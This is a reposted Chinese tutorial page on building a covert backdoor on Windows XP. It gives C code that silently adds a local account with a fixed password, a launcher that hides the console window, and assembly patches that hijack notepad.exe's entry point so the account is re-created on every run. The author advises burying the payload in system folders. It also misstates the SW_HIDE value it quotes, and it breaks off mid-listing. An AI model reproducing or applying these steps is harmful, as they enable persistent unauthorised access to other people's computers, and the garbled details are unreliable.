当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 逆向工程打造隐蔽的后门

安全基础
IE浏览器防黑十大秘籍,黑客也没招
网络工程师讲解系统安全漏洞的形成和防治
清除导致XP系统反复重启的新网银木马
识破QQ欺骗网络地址的几种方法汇总
安全基础知识 细说暴库的原理与方法
排除无线突然中断故障实例
强搜天线 搜出WiFi世界的安全漏洞
网管应用技巧 内网安全十大策略说明
如何修改局域网内部打印机的IP地址
如何找出IIS中隐藏的网站
EFS加密技术的概念分析及一次解密经过
提高Windows XP系统安全性要关闭的10种服务
PHPBB 2.0.22 MOD版最新注入漏洞
修复Windows系统忘记密码的9个高招
用SockOnline软件轻松突破端口限制
安全基础知识 最强0到33600端口详解
执行文件方式加密FLASH文件的解密方法
网吧被入侵后的应对解决方法
网页“黑手”如何攻击你的Windows系统
不要让别人读了你的信 谈私密数据保护

安全基础 中的 逆向工程打造隐蔽的后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 44 ::
收藏到网摘: n/a

本文测试平台:windows xp sp2, vc++6.0

    我很喜欢孟方明[-273]的文章,很有启发性,常常是show一种思路,而不仅仅是一种方法。
《逆向工程打造隐蔽的后门》中的添加用户的后门,还没有做到真正的隐蔽,因为有2次会闪过dos(我也不知道改叫什么窗口,暂且叫dos吧)窗口。但是孟方明提供了思路,我等菜鸟花了数星期研究之后,小有心得,拿出来给大家分享,下面我来给出方法:

开始真正的测试之前,先看下面的下面这个程序代码(相信菜鸟也可以看懂):


//测试程序,作用添加一个用户test并修改密码为windows
//AddUser.cpp
#include

int main(int argc, char* argv[])
{
system("net user test /add");
system("net user test windows");

system("pause"); //暂停程序,以便查看程序是否成功运行,实际应用时去掉
return 0;
}

编译一下,将生成的程序重命名为AddUser.exe,运行


没有关系,赶紧删除test这个用户

再来看看下面的代码:

// ExecuteAddUser.cpp
#include

int main(int argc, char* argv[])
{
ShellExecute(0, "open", "AddUser.exe", "", "", SW_HIDE); //注意SW_HIDE

system("pause");   //暂停程序,以便查看程序是否成功运行,实际应用时去掉
return 0;
}


也编译一下,生成ExecuteAddUser.exe,现在把AddUser.exe复制到ExecuteAddUser.exe所在的目录。运行ExecuteAddUser.exe, 嘿嘿,你没有看到AddUser.exe闪过dos窗口吧。去看看系统用户,看到test用户了吧。为什么没有显示窗口呢?上面已经表示出来了这里的参数SW_HIDE就是不显示窗口的意思,详细描述请查阅MSDN。而且进程列表里面没有cmd.exe

到这里我们的具体思路就已经出来了:
    只要把ExecuteAddUser.exe的代码嵌入到某一个程序里面(假设这里是A.exe),这样每次运行A.exe就会执行我们的AddUser.exe,如果把ExecuteAddUser.exe的代码嵌入到记事本,嘿嘿,那么这个用户就很难从机器上消失了,是不是有点强盗逻辑。

    想法是好的,但是要嵌入到某一个程序里面,就需要注意这里的参数SW_HIDE了,因为我们嵌入的时候,代码不能用SW_HIDE。其实SW_HIDE是微软定义的一个宏而已,我想到一个比较傻的办法来解决这个问题。
在vc++的目录搜索。终于在WINUSER.H中
找到如下定义:
/*
* ShowWindow() Commands
*/
#define SW_HIDE         0
中间的省略。
#define SW_MAX         11

可以看到SW_HIDE被定义为1。

问题解决了,去掉AddUser.cpp中的system("pause"); 去掉再次编译为AddUser.exe,复制到D盘(这里只是测试,实际上可能会被放到
c:\windows\system32\......,藏得越深越好啊)。

剩下的事情就很简单了基本上就是和孟方明的操作一样。修改如下:

原来的记事本入口:

01006AE0 > $ 6A 70       PUSH 70
01006AE2   . 68 88180001   PUSH notepad.01001888
01006AE7   . E8 BC010000   CALL notepad.01006CA8

修改为:

01006AE0 > $ /E9 BB120000   JMP notepad_.01007DA0
01006AE5   > |90         NOP
01006AE6   . |90         NOP
01006AE7   . |E8 BC010000   CALL notepad_.01006CA8

在01007D74添加如下字符:

01007D74   . 64 3A 5C 5C 4>ASCII "d:\\AddUser.exe",0
01007D84   . 6F 70 65 6E 0>ASCII "open",0



修改01007DA0为:
01007DA0   > \60         PUSHAD
01007DA1   . 6A 00       PUSH 0                       ; /IsShown = 0
01007DA3   . 6A 00       PUSH 0                       ; |DefDir = NULL
01007DA5   . 6A 00       PUSH 0            &nbs